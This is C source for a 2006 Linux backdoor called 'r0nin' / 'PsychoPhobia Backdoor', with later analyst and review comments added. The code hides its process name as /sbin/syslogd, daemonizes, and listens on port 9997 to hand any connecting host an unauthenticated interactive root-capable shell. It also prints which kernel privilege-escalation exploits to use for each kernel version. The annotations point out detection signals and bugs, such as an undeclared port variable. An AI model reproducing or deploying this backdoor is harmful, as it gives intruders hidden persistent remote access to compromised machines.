/* r0nin v3.0 by m0rtix */     
                               
//////////////////////////////////////////////////////////////////
// Bind port, "ps aux" masked, Tell u if rootab or no etc...    //
//                                                              //
// m0rtix (c) 2006                                              //
// irc.epiknet.org #hakin9                                      //
//                            //
// Une petite pensée pour Sympt0me....                          //
//reloaded_matrix_revolutions@hotmail.com                       //
//////////////////////////////////////////////////////////////////

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <pwd.h>
#include <string.h>
#include <fcntl.h>
#include <signal.h>

#include <sys/resource.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/utsname.h>
#include <sys/wait.h>



#define MASK "/sbin/syslogd"
#define HOME "/"
#define   TIOCSCTTY   0x540E
#define TIOCGWINSZ      0x5413
#define TIOCSWINSZ      0x5414
#define ECHAR   0x1d
#define   BUF   32768
#define   PORT 9997

int leserver(void);
int rootab(void);
int noroot(void);
int kwst(void);
int oslinux(void);
int bsdbsd(void);



/*
 * Entry point: looks up the invoking user's login name and the uname()
 * data, overwrites argv[0] with MASK, prints a banner, then calls kwst()
 * (kernel-version report) and leserver() (network listener).
 *
 * For analysts: the argv[0] overwrite only changes what command-line based
 * listings display. The executable path the kernel records for the process
 * (for example /proc/<pid>/exe on Linux) is not touched by this code, so a
 * mismatch between the two is a usable detection signal.
 */
int main(int argc, char *argv[]) {



//have the current user in bash !!!
   
int uid = getuid();
struct passwd *pwd_str;
/* NOTE(review): getpwuid() can return NULL (no passwd entry for the uid);
 * the result is dereferenced below without a check. */
pwd_str = getpwuid(uid);
char *login;
/* NOTE(review): the allocation has no room for the terminating NUL and
 * strncpy() with this length does not write one, so the later "%s" print of
 * login reads past the end of the buffer. malloc() is also unchecked. */
login = malloc(strlen(pwd_str->pw_name));
strncpy(login, pwd_str->pw_name, strlen(pwd_str->pw_name));

//have the current kernel version !!!!

struct utsname *bof = (struct utsname*) malloc(sizeof(struct utsname));
int test;
/* Assignment inside the condition is intentional here: a non-zero return
 * from uname() is treated as failure. */
if(test = uname(bof)) {
printf("Error %i\n", test);
exit(1); }

//to be hidden for "PS" command:
/* Writes MASK over the original argv[0] storage in place. No length check:
 * if the original argv[0] is shorter than MASK, the copy runs into whatever
 * follows it in memory. */
strcpy(argv[0], MASK);

fprintf(stdout, "\n\t     ,--.     |    o      ");
fprintf(stdout, "\n\t,-.-.|  |,---.|--- ..  ,  ");
fprintf(stdout, "\n\t| | ||  ||    |    | ><   ");
fprintf(stdout, "\n\t` ' '`--'`    `---'`'  `  \n");

fprintf(stdout, "\nPsychoPhobia Backdoor v3 by m0rtix is starting...OK, pid = %ld\n", (long)getpid());

/* The port in this banner is a string literal, independent of the PORT macro. */
fprintf(stdout, "Shell on: 9997      User: %s        UID: %ld\n", login, (long)getuid());
/* argv[0] already holds MASK at this point, so that is the name printed. */
fprintf(stdout, "Name: %s  (Masked in PS! )  v: = %s %s %s\n\n", argv[0], bof->sysname, bof->nodename, bof->release);

kwst();
/* leserver() returns only if socket setup fails; its return value is ignored. */
leserver();



return 0;
}

//////////////////////////////


//LESERVER - listen on 9997 port and give U a shell...

/* Local declaration of the terminal window-size record that leserver()
 * fills in and passes to ioctl(TIOCSWINSZ). It is declared here by hand;
 * no system header that would provide it is included by this file. */
struct winsize {
   unsigned short ws_row;     /* rows, set from the client's size message */
   unsigned short ws_col;     /* columns, set from the client's size message */
   unsigned short ws_xpixel;  /* always set to 0 by leserver() */
   unsigned short ws_ypixel;  /* always set to 0 by leserver() */
};

/////////////////////////////////////////////////:
                                                 
/*
 * Build a legacy pty/tty device name in buf: the string in base followed by
 * one letter chosen by the high nibble of num and one hex digit chosen by
 * the low nibble, then a NUL.
 *
 * num  - index; only its low 8 bits are used
 * base - prefix such as "/dev/pty" or "/dev/tty"
 * buf  - output; must hold at least strlen(base) + 3 bytes (not checked here)
 */
void   get_tty(int num, char *base, char *buf)
{
   char   series[] = "pqrstuvwxyzabcde";
   char   subs[] = "0123456789abcdef";
   int   pos = strlen(base);
   strcpy(buf, base);
   buf[pos] = series[(num >> 4) & 0xF];
   buf[pos+1] = subs[num & 0xF];
   buf[pos+2] = 0;
}


/////////////////////////////////////////////

/*
 * Find a free legacy pty pair by trying the 256 names get_tty() can build.
 *
 * tty - receives the descriptor of the opened "/dev/ttyXY" side
 * pty - receives the descriptor of the opened "/dev/ptyXY" side
 *
 * Returns 1 when both sides of one pair were opened, 0 when none could be.
 * On a 0 return *tty and *pty hold the results of the last failed attempts.
 */
int   open_tty(int *tty, int *pty)
{
   char   buf[512];
   int   i, fd;
   
   /* /dev/ptmx is opened and closed immediately; the descriptor is never
    * used and the open() result is not checked. */
   fd = open("/dev/ptmx", O_RDWR);
   close(fd);
   
   for (i=0; i < 256; i++) {
      get_tty(i, "/dev/pty", buf);
      *pty = open(buf, O_RDWR);
      if (*pty < 0) continue;
      get_tty(i, "/dev/tty", buf);
      *tty = open(buf, O_RDWR);
      if (*tty < 0) {
         /* the matching tty side is unavailable: release the pty side and
          * move on to the next name */
         close(*pty);
         continue;
      }
      return 1;
   }
   return 0;
}

///////////////////////////////////////////////////

/*
 * SIGCHLD handler: re-installs itself and reaps at most one exited child
 * without blocking (WNOHANG). The signal number argument is unused.
 */
void   sig_child(int i)
{
   signal(SIGCHLD, sig_child);
   waitpid(-1, NULL, WNOHANG);
}

//////////////////////////////////////////////////:
                                                   
/*
 * Signal handler installed by the per-connection child for SIGHUP and
 * SIGTERM: sends SIGHUP and then SIGTERM to every process in the caller's
 * process group (pid 0 in kill() means "my process group"). The signal
 * number argument is unused.
 */
void   hangout(int i)
{
   kill(0, SIGHUP);
   kill(0, SIGTERM);
}

/////////////////////////////////////////////////////

/*
 * leserver - TCP listener and per-connection pty relay.
 *
 * Creates a TCP socket bound to INADDR_ANY, detaches from the terminal
 * (setsid, chdir("/"), stdin/stdout/stderr redirected to /dev/null) and
 * loops on accept(). Each accepted connection is handled in a forked child
 * that reads environment strings from the peer, opens a pty pair, execs
 * "/bin/sh -i" on the tty side in a further child, and copies bytes between
 * the socket and the pty until either side closes.
 *
 * Nothing in this function authenticates or filters the peer: every host
 * that can reach the port is handed the shell, and no credential change is
 * made before the exec.
 *
 * Traits observable from the outside, all taken from the code below: a
 * listening TCP socket on all interfaces, a long-lived process whose
 * descriptors 0-2 point at /dev/null, and child processes running
 * "/bin/sh -i" on a /dev/ttyXY device with HOME=/ in their environment.
 *
 * Returns 1 if socket(), bind() or listen() fails. Otherwise it does not
 * return: the accept loop has no exit path.
 */
int leserver(void) {
       int   pid;
   struct   sockaddr_in   serv;
   struct   sockaddr_in   cli;
   int   sock;
   
   sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
   if (sock < 0) {
      perror("socket");
      return 1;
   }

   bzero((char *) &serv, sizeof(serv));
   serv.sin_family = AF_INET;
   /* INADDR_ANY: the listener accepts connections on every local address */
   serv.sin_addr.s_addr = htonl(INADDR_ANY);
   /* NOTE(review): `port` is not declared anywhere in this listing; the only
    * port definition visible is the PORT macro. */
   serv.sin_port = htons(port);
   if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0) {
      perror("bind");
      return 1;
   }
   if (listen(sock, 5) < 0) {
      perror("listen");
      return 1;
   }
   

   /* daemonize: new session, cwd "/", stdio on /dev/null. `pid` is reused
    * here as a scratch file descriptor. None of these calls is checked. */
   setsid();
   chdir("/");
   pid = open("/dev/null", O_RDWR);
   dup2(pid, 0);
   dup2(pid, 1);
   dup2(pid, 2);
   close(pid);
   signal(SIGHUP, SIG_IGN);
   signal(SIGCHLD, sig_child);
   while (1) {
      int   scli;
      int   slen;
      slen = sizeof(cli);
      scli = accept(sock, (struct sockaddr *) &cli, &slen);
      if (scli < 0) continue;
      /* one child per connection; a fork() failure (-1) is not handled and
       * simply drops the connection via the close() at the loop's end */
      pid = fork();
      if (pid == 0) {
         int   subshell;
         int   tty;
         int   pty;
         fd_set   fds;
         char   buf[BUF];
         char   *argv[] = {"sh", "-i", NULL};
         #define MAXENV   256
         #define   ENVLEN   256
         char   *envp[MAXENV];
         char   envbuf[(MAXENV+2) * ENVLEN];
         int   j, i;
         char   home[256];

         /* Set up the environment: envp[0] is "HOME=" plus the HOME macro;
          * every further entry is a slot of ENVLEN bytes filled straight
          * from the socket, so the peer chooses the shell's environment.
          * The loop stops when a read() returns fewer than ENVLEN bytes,
          * when MAXENV slots are used, or when the slot just read starts
          * with '\n'.
          * NOTE(review): read() is not checked for -1, the slots are not
          * NUL-terminated by this code, and once j reaches MAXENV the
          * stores to envp[MAXENV] and envp[MAXENV+1] are past the end of
          * the envp array. */
         envp[0] = home;
         sprintf(home, "HOME=%s", HOME);
         j = 0;
         do {
            i = read(scli, &envbuf[j * ENVLEN], ENVLEN);
            envp[j+1] = &envbuf[j * ENVLEN];
            j++;
            if ((j >= MAXENV) || (i < ENVLEN)) break;
         } while (envbuf[(j-1) * ENVLEN] != '\n');
         envp[j+1] = NULL;

         /* create new group */
         setpgid(0, 0);

         /* open slave & master side of tty */
         if (!open_tty(&tty, &pty)) {
            char   msg[] = "Can't fork pty, bye!\n";
            write(scli, msg, strlen(msg));
            close(scli);
            exit(0);
         }
         /* fork child that becomes the shell; fork() failure (-1) is not
          * checked */
         subshell = fork();
         if (subshell == 0) {
            /* close master */
            close(pty);
            /* attach tty: new session, then make the tty the controlling
             * terminal */
            setsid();
            ioctl(tty, TIOCSCTTY);
            /* close local part of connection */
            close(scli);
            close(sock);
            signal(SIGHUP, SIG_DFL);
            signal(SIGCHLD, SIG_DFL);
            /* the tty becomes stdin, stdout and stderr of the shell */
            dup2(tty, 0);
            dup2(tty, 1);
            dup2(tty, 2);
            close(tty);
            /* NOTE(review): there is no exit after execve(); if the exec
             * fails this child continues into the relay code below. */
            execve("/bin/sh", argv, envp);
         }
         /* close slave */
         close(tty);

         signal(SIGHUP, hangout);
         signal(SIGTERM, hangout);

         while (1) {
            /* watch tty and client side; select() blocks with no timeout */
            FD_ZERO(&fds);
            FD_SET(pty, &fds);
            FD_SET(scli, &fds);
            if (select((pty > scli) ? (pty+1) : (scli+1),
                &fds, NULL, NULL, NULL) < 0)
                {
                   break;
            }
            /* shell output -> client */
            if (FD_ISSET(pty, &fds)) {
               int   count;
               count = read(pty, buf, BUF);
               if (count <= 0) break;
               if (write(scli, buf, count) <= 0) break;
            }
            /* client input -> shell, with in-band window-size handling */
            if (FD_ISSET(scli, &fds)) {
               int   count;
               unsigned   char *p, *d;
               d = buf;
               count = read(scli, buf, BUF);         
               if (count <= 0) break;
               
               /* Window-size message: the ECHAR byte followed by four
                * bytes, columns (high, low) then rows (high, low). Any
                * ECHAR byte in the client data is treated as this marker;
                * only the first one in the buffer is handled. */
               p = memchr(buf, ECHAR, count);
               if (p) {
                  unsigned char   wb[5];
                  int   rlen = count - ((ulong) p - (ulong) buf);
                  struct   winsize ws;

                  /* wait for rest: if fewer than 5 bytes of the message
                   * arrived in this read, fetch the remainder from the
                   * socket. NOTE(review): that read() is unchecked, so wb
                   * can be left partly uninitialised. */
                  if (rlen > 5) rlen = 5;
                  memcpy(wb, p, rlen);
                  if (rlen < 5) {
                     read(scli, &wb[rlen], 5 - rlen);
                  }

                  /* setup window, then signal the caller's process group */
                  ws.ws_xpixel = ws.ws_ypixel = 0;
                  ws.ws_col = (wb[1] << 8) + wb[2];
                  ws.ws_row = (wb[3] << 8) + wb[4];
                  ioctl(pty, TIOCSWINSZ, &ws);
                  kill(0, SIGWINCH);

                  /* write the rest: bytes before the marker, then any bytes
                   * that follow the 5-byte message */
                  write(pty, buf, (ulong) p - (ulong) buf);
                  rlen = ((ulong) buf + count) - ((ulong)p+5);
                  if (rlen > 0) write(pty, p+5, rlen);
               } else
                  if (write(pty, d, count) <= 0) break;
            }
         }
         /* relay ended: release descriptors, reap the shell, hang up */
         close(scli);
         close(sock);
         close(pty);

         waitpid(subshell, NULL, 0);
         vhangup();
         exit(0);
      }
      /* parent keeps listening; the connection belongs to the child */
      close(scli);
   }
}

////////////////////////////////////////////////////////////////////////



//END LESERVER


/////////////////////////////////////

//KWST - rootab ??????????
/*
 * Dispatch on the operating-system name reported by uname(): "Linux" goes
 * to oslinux(), "FreeBSD" goes to bsdbsd(), anything else does nothing.
 * Exits the process with status 1 if uname() fails. Always returns 0.
 * The utsname buffer is allocated without a NULL check and never freed.
 */
int kwst(void) {
   
struct utsname *bof = (struct utsname*) malloc(sizeof(struct utsname));
int test;
/* non-zero from uname() means failure */
if(test = uname(bof)) {
printf("Error %i\n", test);
exit(1); }

char *osdev = bof->sysname;

if (strcmp(osdev, "Linux") == 0) 
oslinux(); else { if(strcmp(osdev, "FreeBSD") == 0) {
bsdbsd(); }}

return 0; }
//END KWST

//////////////////////////////////////

//OSLINUX - if is Linux:

/*
 * Print a fixed message chosen by a prefix match on the kernel release
 * string from uname(). Each branch prints a "Rootab" line with a list of
 * names (presumably local privilege-escalation exploits the author
 * associates with that release); an unmatched release prints the release
 * string itself. Exits with status 1 if uname() fails. Always returns 0.
 *
 * The chain is first-match-wins on strncmp() prefixes, so what is printed
 * depends on the compare length in each branch:
 *   - "2.6.2" .. "2.6.9" are compared over 5 characters, so a release such
 *     as "2.6.2x" also matches the "2.6.2" branch;
 *   - "2.6.10" .. "2.6.15" are also compared over only 5 characters, which
 *     is "2.6.1" for all of them; the "2.6.10" branch therefore takes every
 *     such release and the "2.6.11" .. "2.6.15" branches cannot be reached.
 *
 * For analysts: the message literals below are fixed text in the binary
 * and can serve as string-match indicators for this sample.
 */
int oslinux(void) {
   
///////////////// THanks to Anissina_Keiko ///////////////////////////////


/* uname() is queried again here; the buffer is unchecked and never freed */
struct utsname *bof = (struct utsname*) malloc(sizeof(struct utsname));
int test;
if(test = uname(bof)) {
printf("Error %i\n", test);
exit(1); }

char *kernelver = bof->release;

//////////////////////////////////////////// KERNEL 2.2.* //////////////////

if (strncmp(kernelver, "2.2.", 4) == 0) 
{
   printf("\nRootab !! use: ptrace!");
}
//////////////////////////////////////////// KERNEL 2.4.*  //////////////////
else if(strncmp(kernelver, "2.4.17", 6) == 0)
{
   printf("\nRootab !! use: Kmod, newlocal !");
} else if (strncmp(kernelver, "2.4.18", 6) == 0)
{
   printf("\nRootab !! use: Brk, newlocal, Kmod or Kmod2 !");
} else if (strncmp(kernelver, "2.4.19", 6) == 0)
{
   printf("\nRootab !! use: Brk, newlocal, Kmod or Kmod2 !");
} else if (strncmp(kernelver, "2.4.20", 6) == 0)
{
   printf("\nRootab !! use: elflbl, Ptrace, Brk2, w00t(if 2003), Kmod or Kmod2 !");
} else if (strncmp(kernelver, "2.4.21", 6) == 0)
{
   printf("\nRootab !! use: Brk2, Ptrace, w00t(if 2003), Krad3(if elSMP), Kmod2 !");
} else if (strncmp(kernelver, "2.4.22", 6) == 0)
{
   printf("\nRootab !! use: Brk2, Ptrace, w00t(if 2003), Kmod2 !");
} else if (strncmp(kernelver, "2.4.23", 6) == 0)
{
   printf("\nRootab !! use: mremap_pte!");
} else if (strncmp(kernelver, "2.4.24", 6) == 0)
{
   printf("\nRootab !! use: mremap_pte!");
} else if (strncmp(kernelver, "2.4.25", 6) == 0)
{
   printf("\nRootab !! use: mremap_pte, Uselib24!");
} else if (strncmp(kernelver, "2.4.26", 6) == 0)
{
   printf("\nRootab !! use: mremap_pte, Uselib24!");
} else if (strncmp(kernelver, "2.4.27", 6) == 0)
{
   printf("Rootab !! use: don't know lol!\n");
}
//////////////////////////////////////////////////// KERNEL 2.6.* ///////////////////
else if (strncmp(kernelver, "2.6.2", 5) == 0)
{
   printf("\nRootab !! use: expand_stack, mremap_pte!");
} else if (strncmp(kernelver, "2.6.3", 5) == 0)
{
   printf("\nRootab !! use: expand_stack, Krad(if 2004) !");
} else if (strncmp(kernelver, "2.6.4", 5) == 0)
{
   printf("\nRootab !! use: expand_stack, Krad(if 2004) !");
} else if (strncmp(kernelver, "2.6.5", 5) == 0)
{
   printf("\nRootab !! use: expand_stack, Krad(if 2004) !");
} else if (strncmp(kernelver, "2.6.6", 5) == 0)
{
   printf("\nRootab !! use: expand_stack, Krad(if 2004) !");
} else if (strncmp(kernelver, "2.6.7", 5) == 0)
{
   printf("\nRootab !! use: expand_stack, Krad(if 2004) !");
} else if (strncmp(kernelver, "2.6.8", 5) == 0)
{
   printf("\nRootab !! use: expand_stack, Krad(if 2004) !");
} else if (strncmp(kernelver, "2.6.9", 5) == 0)
{
   printf("\nRootab !! use: expand_stack, Krad(if 2004), Krad2(if 2004), Krad3 !");
} else if (strncmp(kernelver, "2.6.10", 5) == 0)
{
   /* compare length 5: this branch matches every release starting "2.6.1" */
   printf("\nRootab !! use: expand_stack, Krad(if 2004), Krad2(if 2004), Krad3 !");
} else if (strncmp(kernelver, "2.6.11", 5) == 0)
{
   printf("\nRootab !! use: expand_stack, Krad2(if 2004), Krad3 !");
} else if (strncmp(kernelver, "2.6.12", 5) == 0)
{
   printf("\nRootab !! use: expand_stack, Krad2(if 2004) !");
} else if (strncmp(kernelver, "2.6.13", 5) == 0)
{
   printf("\nRootab !! use: expand_stack !");
} else if (strncmp(kernelver, "2.6.14", 5) == 0)
{
   printf("\nRootab !! use: expand_stack !");
} else if (strncmp(kernelver, "2.6.15", 5) == 0)
{
   printf("\nRootab !! use: expand_stack !");
} else
{
   printf("\nDon't know for ths version:   %s\n", kernelver);
}

return 0;
}

//END OS

/////////////////////////////////////////

//BSDBSD If FreeBSD:
     
/*
 * FreeBSD branch of kwst(): prints a fixed message to stdout saying no
 * assessment is available for this system, and returns 0. It performs no
 * checks of its own.
 */
int bsdbsd(void) {
fprintf(stdout, "\n\t Oh NOoo !!! it's a FreeBSD system, i can't say you if this sheat is rootab !!\n\n");
return 0;
}

//BSDBSD END

//////////////////////////////////////////// 